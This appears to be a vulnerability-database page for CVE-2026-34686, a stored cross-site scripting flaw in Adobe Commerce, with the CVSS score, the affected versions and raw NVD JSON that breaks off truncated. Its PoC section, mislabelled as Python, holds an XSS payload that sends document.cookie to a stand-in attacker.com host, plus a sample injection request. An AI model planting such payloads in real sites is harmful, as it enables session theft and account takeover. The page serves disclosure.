CVE-2026-34686

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE

Adobe Commerce <= 2.4.9-beta1

Adobe Commerce <= 2.4.8-p4

Adobe Commerce <= 2.4.7-p9

Adobe Commerce <= 2.4.6-p14

Adobe Commerce <= 2.4.5-p16

Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for Adobe Commerce Stored XSS (CVE-2026-34686) // Attacker injects this payload into a vulnerable form field (e.g., Product Name or User Profile) // Simple payload to test execution var payload = '<img src=x onerror=alert(1)>'; // Advanced payload to steal cookies (demonstration purposes only) var stealPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'; // Example HTTP Request simulation /* POST /admin/customer/save HTTP/1.1 Host: target-adobe-commerce.com Content-Type: application/x-www-form-urlencoded firstname=John&lastname=Doe&[email protected]&custom_field=' + encodeURIComponent(payload) + ' */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34686
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34686
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34686/
[4] VulDB https://vuldb.com/cve/CVE-2026-34686
[5] https://helpx.adobe.com/security/products/magento/apsb26-49.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34686", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:38.597", "lastModified": "2026-05-13T18:37:08.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*", "matchCriteriaId": "4E5CF6F0-2388-4D3F-8FE1-43B8AF148564"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*", "matchCriteriaId": "1C3D7164-1C5F-40BC-9EEC-B0E00CD45808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*", "matchCriteriaId": "68AAE162-5957-42AF-BE20-40F341837FAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*", "matchCriteriaId": "D9D01159-3309-4F6B-93B0-2D89DDD33DEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*", "matchCriteriaId": "91736E79-D8E7-4AF2-8E01-A7B4EB8AD6F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*", "matchCriteriaId": "8412C043-64E7-4DFF-A303-13A6FE113BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*", "matchCriteriaId": "BBDA2BCF-E784-4CF3-B30D-6FF5BEE2055F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p16:*:*:*:*:*:*", "matchCriteriaId": "00909C10-6C93-4735-94ED-18DCBD608A28"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p17:*:*:*:*:*:*", "matchCriteriaId": "C6F35FE6-853D-4EC6-8A4F-07F4ABD6301A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*", "matchCriteriaId": "D6D6F1A7-ABB5-4EDC-9EA8-98B74518847A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*", "matchCriteriaId": "CFEBDDF2-6443-4482-83B2-3CD272CF599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*", "matchCriteriaId": "6661093F-8D22-450F-BC6C-A8894A52E6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*", "matchCriteriaId": "2515DA6D-2E74-4A05-BD29-FEEF3322BCB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*", "matchCriteriaId": "69A1F1F7-E53C-40F3-B3D9-DC011FC353BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*", "matchCriteriaId": "6A56E96C-6CE5-442C-AA88-F0059B02B5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*", "matchCriteriaId": "8867F510-201C-4199-8554-53DE156CE669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*", "matchCriteriaId": "23988132-DD4E-4968-B6B8-954122F76081"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*", "matchCriteriaId": "7F5E9DB6-1386-4274-8270-2FE0F0CAF7FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*", "matchCriteriaId": "5764CC97-C866-415D-A3A1-5B5B9E1C06A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*", "matchCriteriaId": "E82D10D8-2894-4E5B-B47B-F00964DD5CDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p12:*:*:*:*:*:*", "matchCriteriaId": "B044F2D9-E888-4852-8A40-DCE688860ED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p13:*:*:*:*:*:*", "matchCriteriaId": "6423C754-36F9-4680-9211-60940ED63E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p14:*:*:*:*:*:*", "matchCriteriaId": "3472064A-8C79-436B-965A-96834AE8D346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p15:*:*:*:*:*:*", "matchCriteriaId": "CDA8ABEB-F955-4D34-8219-C518B49F5543"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p16:*:*:*:*:*:*", "matchCriteriaId": "55D6A6BD-9E63-448A-A286-437EA1580CEF"}, {"vuln ... (truncated)